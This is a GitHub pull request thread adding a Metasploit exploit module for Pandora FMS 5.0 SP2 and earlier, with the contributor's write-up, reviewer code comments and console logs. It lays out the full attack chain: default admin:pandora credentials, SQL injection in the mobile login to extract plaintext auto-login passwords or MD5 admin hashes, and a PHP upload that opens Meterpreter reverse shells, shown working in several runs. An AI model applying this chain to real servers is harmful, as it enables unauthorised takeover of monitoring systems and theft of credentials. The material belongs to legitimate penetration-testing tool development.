Added Pandora FMS RCE and SQLi module #2985

Merged
merged 1 commit into from Nov 26, 2014

Conversation

Projects
None yet
5 participants
Contributor

pyoor commented Feb 12, 2014

***This is a corrected PR to replace PR #2979

Remote Code Execution in Pandora FMS 5.0 SP2 and below (Tested on 4.0.2/4.1.1/5.0SP2 appliances).

How to replicate the vulnerable environment:

Download Pandora FMS 5.2 SP2: http://sourceforge.net/projects/pandora/files/Pandora%20FMS%205.0/FinalSP2/PandoraFMS5.0SP2-131226_64bit.iso/download

This module performs several steps in order to gain RCE. First, the module attempts to authenticate using default credentials. If this fails a SQL injection vulnerability affecting the mobile login form is exploited. Pandora FMS implements an "Auto login" hash which stores plaintext passwords in the database. Leveraging the SQLi, the plain-text password is extracted and used to authenticate. Once authenticated, this module will leverage the file manager functionality in order to upload a PHP payload.

If all methods fail the SQLi is leveraged in order to extract the admin MD5 password hash for offline cracking.

Using default credentials:

msf > use exploit/linux/http/pandorafms_sqli 
msf exploit(pandorafms_sqli) > show options

Module options (exploit/linux/http/pandorafms_sqli):

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   PASS       pandora            no        The password to authenticate with
   Proxies                       no        Use a proxy chain
   RHOST                         yes       The target address
   RPORT      80                 yes       The target port
   TARGETURI  /pandora_console/  yes       The URI of the vulnerable Pandora FMS instance
   USER       admin              no        The username to authenticate with
   VHOST                         no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Pandora FMS version <= 5.0 SP2


msf exploit(pandorafms_sqli) > set RHOST 192.168.0.117
RHOST => 192.168.0.117
msf exploit(pandorafms_sqli) > exploit

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:pandora)
[*] 192.168.0.117:80 - Successfully authenticated!
[*] 192.168.0.117:80 - Attempting to retrieve session cookie
[*] 192.168.0.117:80 - Successfully retrieved session cookie: PHPSESSID=8vulgtr2l7c38b7ev6kv1jlg27
[*] 192.168.0.117:80 - Attempting to inject payload
[*] 192.168.0.117:80 - Successfully injected payload
[*] Sending stage (39195 bytes) to 192.168.0.117
[*] Meterpreter session 1 opened (192.168.0.134:4444 -> 192.168.0.117:40361) at 2014-02-11 13:01:03 -0500
[*] 192.168.0.117:80 - Cleaning script remnants
[*] 192.168.0.117:80 - Script removed successfully

Using "Auto login" hash mechanism:

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:badpassword)
[-] 192.168.0.117:80 - Authentication failed!
[*] 192.168.0.117:80 - Attempting to extract auto login hash
[*] 192.168.0.117:80 - Extracted auto login password (foobar123)
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:foobar123)
[*] 192.168.0.117:80 - Successfully authenticated!
[*] 192.168.0.117:80 - Attempting to retrieve session cookie
[*] 192.168.0.117:80 - Successfully retrieved session cookie: PHPSESSID=hifh2b2vnscfjn196p8p4tskh3
[*] 192.168.0.117:80 - Attempting to inject payload
[*] 192.168.0.117:80 - Successfully injected payload
[*] Sending stage (39195 bytes) to 192.168.0.117
[*] Meterpreter session 2 opened (192.168.0.134:4444 -> 192.168.0.117:40362) at 2014-02-11 13:02:46 -0500
[*] 192.168.0.117:80 - Cleaning script remnants
[*] 192.168.0.117:80 - Script removed successfully

Resort to password extraction:

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:badpassword)
[-] 192.168.0.117:80 - Authentication failed!
[*] 192.168.0.117:80 - Attempting to extract auto login hash
[-] 192.168.0.117:80 - No auto login password has been defined!
[*] 192.168.0.117:80 - Attempting to extract admin password hash
[*] 192.168.0.117:80 - Extracted admin password hash - [ 1da7ee7d45b96d0e1f45ee4ee23da560 ]
[-] Exploit failed: 192.168.0.117:80 - Unable to perform remote code execution!
Contributor

wchen-r7 commented Feb 12, 2014

Thanks for the update. You're not actually replacing the current Pandora exploit, though. You're adding another one. It would make more sense to simply update the file in my opinion.

Contributor

pyoor commented Feb 12, 2014

@wchen-r7 Sorry, I'm confused. Has PR #2979 already been fully merged?
The reason I issued this PR is because #2979 showed 0 commits and I had already deleted that branch.

Also this PR includes the changes requested by @jlee-r7 and @jvazquez-r7

Contributor

jlee-r7 commented Feb 12, 2014

@wchen-r7 no, this is a different bug.

Contributor

wchen-r7 commented Feb 12, 2014

Ah ok. My bad.

Contributor

jlee-r7 commented Feb 14, 2014

I have no idea what is up with #2979, but i'll take this one.

+ 'uri' => normalize_uri(uri, "index.php")
+ })
+
+ if res && res.code == 200 and res.body =~ /Pandora FMS - the Flexible Monitoring System/ && res.body =~ /(?<=xx-small;">v)(.*?)(?=<\/td>)/
@jlee-r7

jlee-r7 Feb 14, 2014

Contributor

Don't use and. && instead, please

+ return Exploit::CheckCode::Unknown
+ end
+
+ if version and version <= "4.1.1"
@jlee-r7

jlee-r7 Feb 14, 2014

Contributor

Don't use and. && instead, please

+ # Extract password hash from database
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri("#{uri}", "mobile/index.php"),
@jlee-r7

jlee-r7 Feb 14, 2014

Contributor
      'uri'    => normalize_uri(uri, "mobile", "index.php"),
Contributor

pyoor commented Feb 17, 2014

Implemented @jlee-r7 requested changes with commit faae51f

Contributor

pyoor commented Feb 21, 2014

@jlee-r7 Is everything good with the latest commit? I just wanted to make sure that I addressed all of your change requests.

@jlee-r7 jlee-r7 referenced this pull request in pyoor/metasploit-framework Mar 10, 2014

Merged

Improvements for PandoraFMS SQLi module #1

Merge pull request #1 from jlee-r7/land-2985-pandorafms-sqli
Improvements for PandoraFMS SQLi module
Contributor

jvazquez-r7 commented Mar 28, 2014

Thanks @pyoor ! waiting to listen from travis and testing...

Contributor

jvazquez-r7 commented Mar 28, 2014

Exploits looks like working:

msf exploit(pandorafms_sqli) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.137:80 - Attempting to authenticate using (admin:pandora)
[*] 192.168.172.137:80 - Successfully authenticated!
[*] 192.168.172.137:80 - Attempting to retrieve session cookie
[*] 192.168.172.137:80 - Successfully retrieved session cookie: PHPSESSID=6e66ucgkun60oqe8tlr9imd834;
[*] 192.168.172.137:80 - Attempting to upload payload
[*] 192.168.172.137:80 - Successfully uploaded payload
[*] Sending stage (39848 bytes) to 192.168.172.137
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.137:33137) at 2014-03-28 17:54:16 -0500
[*] 192.168.172.137:80 - Cleaning script remnants
[-] 192.168.172.137:80 - Could not identify file manager form!
[!] 192.168.172.137:80 - Failed to remove yFTyUBDf.php

meterpreter > ls

Listing: /var/www/html/pandora_console/images
=============================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  1381   fil   2014-03-28 11:52:54 -0500  AzbMMllu.php
100644/rw-r--r--  5615   fil   2013-12-25 19:12:19 -0600  MiniLogoArtica.jpg
100644/rw-r--r--  1440   fil   2013-12-25 19:12:19 -0600  add.disabled.png
100644/rw-r--r--  1437   fil   2013-12-25 19:12:19 -0600  add.png

but not the check method:

msf exploit(pandorafms_sqli) > check
[*] 192.168.172.137:80 - Cannot reliably check exploitability.
+ return Exploit::CheckCode::Unknown
+ end
+
+ if version && version <= "4.1.1"
@jvazquez-r7

jvazquez-r7 Mar 28, 2014

Contributor

Doesn't look consistent with the description, maybe a typo :?

+ 'uri' => normalize_uri(uri, "index.php")
+ })
+
+ if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/ && res.body =~ /(?<=xx-small;">v)(.*?)(?=<\/td>)/
@jvazquez-r7

jvazquez-r7 Mar 28, 2014

Contributor

After running the live CD (not install), and running the Pandora FMS Console, I see:

<div id="ver_num">5.0SP2</div>

around the html in the pandora_console/index.php answer

Contributor

jvazquez-r7 commented Mar 28, 2014

I would recommend change the filename to be snake_case compliant:

git mv modules/exploits/linux/http/pandorafms_sqli.rb modules/exploits/linux/http/pandora_fms_sqli.rb 
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
@jvazquez-r7

jvazquez-r7 Mar 28, 2014

Contributor

Looks like you're not using FileDropper, but cleaning by yourself in cleanup.

+ return auth_succeeded?(res)
+ end
+
+ def loginhash
@jvazquez-r7

jvazquez-r7 Mar 28, 2014

Contributor

worths to use snake_case for the function names: login_hash

+ }
+ })
+
+ if res && res.code == 200 && res.body.include?("Success")
@jvazquez-r7

jvazquez-r7 Mar 28, 2014

Contributor

It's not removing the uploaded file, even after exploitation being successful :

msf exploit(pandorafms_sqli) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.137:80 - Attempting to authenticate using (admin:pandora)
[*] 192.168.172.137:80 - Successfully authenticated!
[*] 192.168.172.137:80 - Attempting to retrieve session cookie
[*] 192.168.172.137:80 - Successfully retrieved session cookie: PHPSESSID=k0u5e0fn8k3rdm0s3mevb6stk2;
[*] 192.168.172.137:80 - Attempting to upload payload
[*] 192.168.172.137:80 - Successfully uploaded payload
[*] Sending stage (39848 bytes) to 192.168.172.137
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.137:33148) at 2014-03-28 18:06:50 -0500
[*] 192.168.172.137:80 - Cleaning script remnants
[-] 192.168.172.137:80 - Could not identify file manager form!
[!] 192.168.172.137:80 - Failed to remove tjcqynwI.php

meterpreter > 

(just saying, I'm using the livecd version)

+ end
+
+ # Trigger Payload
+ res = send_request_cgi({
@jvazquez-r7

jvazquez-r7 Mar 28, 2014

Contributor

Probably you would like to add 1 as timeout to this send_request_cgi call, so you don't need to wait the full timeout for send_request_cgi.

@jvazquez-r7

jvazquez-r7 Mar 28, 2014

Contributor

Just do:

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "images", @payload_name),
      'cookie' => @cookie
    }, 1)
Contributor

jvazquez-r7 commented May 30, 2014

ping @pyoor, do you mind to take care of the comments please? thanks!

Contributor

jvazquez-r7 commented Nov 25, 2014

Looks like the author has abandoned this one :( I'm going to try to make the clean up by myself, and hopefully landing.

@jvazquez-r7 jvazquez-r7 assigned jvazquez-r7 and unassigned jlee-r7 Nov 25, 2014

@jvazquez-r7 jvazquez-r7 merged commit b3f7447 into rapid7:master Nov 26, 2014

1 check passed

default The Travis CI build passed
Details

jvazquez-r7 added a commit that referenced this pull request Nov 26, 2014

Contributor

jvazquez-r7 commented Nov 26, 2014

Finished the PR by myself, see final result here: c82acfe

Thanks @pyoor for your submission. If you don't feel comfortable with any change in the landed version, please feel free to do a new pull request. Finished clean up by myself because it lived in the pull request queue too much time. Thanks!

  • Testing:
msf exploit(pandora_fms_sqli) > check
[*] 172.16.158.134:80 - The target appears to be vulnerable.
msf exploit(pandora_fms_sqli) > set VERBOSE true
VERBOSE => true
msf exploit(pandora_fms_sqli) > check

[*] 172.16.158.134:80 - Trying to detect installed version
[*] 172.16.158.134:80 - Pandora FMS 5.0SP2 found
[*] 172.16.158.134:80 - The target appears to be vulnerable.
msf exploit(pandora_fms_sqli) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:80 - Attempting to authenticate using (admin:pandora)
[*] 172.16.158.134:80 - Successfully authenticated!
[*] 172.16.158.134:80 - Attempting to retrieve session cookie
[*] 172.16.158.134:80 - Successfully retrieved session cookie: PHPSESSID=s1l1pc45m23jujmm46g64rm714;
[*] 172.16.158.134:80 - Uploading PHP payload...
[*] 172.16.158.134:80 - Attempting to upload payload YTDhlSEr.php...
[*] 172.16.158.134:80 - Successfully uploaded payload
[*] 172.16.158.134:80 - Executing payload...
[*] Sending stage (40551 bytes) to 172.16.158.134
[+] Deleted YTDhlSEr.php

meterpreter > getuid
Server username: apache (48)
meterpreter > exit
[*] Shutting down Meterpreter...
msf exploit(pandora_fms_sqli) > set USER badlogin
USER => badlogin
msf exploit(pandora_fms_sqli) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:80 - Attempting to authenticate using (badlogin:pandora)
[-] 172.16.158.134:80 - Authentication failed!
[*] 172.16.158.134:80 - Attempting to extract auto login hash via SQLi
[-] 172.16.158.134:80 - No auto login password has been defined!
[*] 172.16.158.134:80 - Attempting to extract admin password hash with SQLi
[+] 172.16.158.134:80 - Extracted admin password hash, unsalted md5 - [ 1da7ee7d45b96d0e1f45ee4ee23da560 ]
[-] Exploit failed [no-access]: 172.16.158.134:80 - Unable to perform remote code execution!
[*] Exploit completed, but no session was created.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment